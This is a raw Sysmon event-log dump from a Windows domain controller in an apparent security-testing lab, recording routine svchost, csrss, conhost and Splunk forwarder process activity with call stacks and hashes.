13:12:06.701{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C900-000000009A01}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.701{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4326-6000-C900-000000009A01}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.708{08A6967A-4326-6000-C900-000000009A01}172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.670{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.639{08A6967A-4326-6000-C800-000000009A01}29923144C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C800-000000009A01}2992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C800-000000009A01}2992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.404{08A6967A-4326-6000-C700-000000009A01}45924292C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4326-6000-C800-000000009A01}2992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.407{08A6967A-4326-6000-C800-000000009A01}2992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4326-6000-C700-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C700-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 